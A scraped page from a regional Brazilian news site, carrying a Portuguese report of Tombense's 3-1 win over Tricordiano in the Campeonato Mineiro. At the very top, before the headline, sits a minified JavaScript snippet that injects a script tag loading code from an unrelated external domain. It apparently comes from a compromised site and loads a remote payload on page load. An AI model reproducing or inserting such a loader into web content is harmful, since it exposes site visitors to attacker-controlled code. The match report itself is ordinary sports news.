;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Enfim! Tombense bate Tricordiano e vence a primeira no campeonato Mineiro. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Enfim! Tombense bate Tricordiano e vence a primeira no campeonato Mineiro.

Em uma partida agitada no estádio Almeidão, em Tombos, o Tombense foi superior ao Tricordiano e conseguiu a primeira vitória no Campeonato Mineiro. Os donos da casa fizeram 3 a 1, deixaram a zona de rebaixamento e, de quebra, empurraram os visitantes para lá. Os gols da partida foram marcados por Conrado, Wangler e Marcelo Macedo para o Tombense; Diogo Capela descontou para o Tricordiano.
Com o resultado, a equipe de Tombos fica em 09ª na tabela, com 4 pontos somados. Já o time de Três Corações cai para 11º, com apenas 3 pontos no Estadual.
As duas equipes não vão ter muito tempo para descansar. O Tombense já volta a campo neste domingo (6), quando enfrenta o Atlético-MG no estádio Independência, em Belo Horizonte (MG). Antes disso, no entanto, o Tricordiano recebe o América-MG no estádio Soares de Azevedo, em Muriaé (MG), no sábado (5), às 16h.
Resposta Rápida
Tombense e Tricordiano começaram o jogo tocando bem a bola e procurando espaços no time adversário. No entanto, os donos da casa jogo mostraram que iriam para cima em busca da primeira vitória no campeonato. Aos 10, Marcelo Macedo bateu com categoria, tentando encobrir Marcão, que fez uma defesaça para evitar o gol do Tombense. E foi o mesmo Marcão quem, pouco depois, apareceu de novo para defender uma bomba de Rodney da entrada da área.
O Jogo
O Tombense começou a gostar da partida e cresceu em campo. Aos 39, após cruzamento em escanteio, a bola sobrou quase na entrada da pequena área para Conrado, que bateu para abrir o placar. A resposta, no entanto, não demorou ao sair. Aos 44, em boa trama do ataque do Tricordiano, Leandro Love recebeu e ajeitou para Diogo Capela, que encheu o pé para empatar o jogo no Almeidão.
Mal começou o segundo tempo em Tombos e os donos da casa voltaram a comemorar. Aos 5, Wangler recebeu na ponta direita, viu Marcão adiantado e bateu com muita categoria para encobrir o goleiro e colocar o Carcará de novo na frente. Melhor em campo, os mandantes continuaram pressionando, até que aos 17, o goleiro do Tricordiano não conseguiu cortar um cruzamento, e Marcelo Macedo apareceu para testar para o fundo das redes.

O Tricordiano mexeu e até ensaiou uma pressão, mas pecou nas finalizações, especialmente após cruzamentos. O Tombense respondeu e também teve algumas boas oportunidades, mas o placar ficou nisto mesmo. Final de jogo, Tombense 3 x 1 Tricordiano, e a primeira vitória do Carcará no Mineiro.

tomb
Fonte:globoesportezonadamata.com/Joao Santana

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.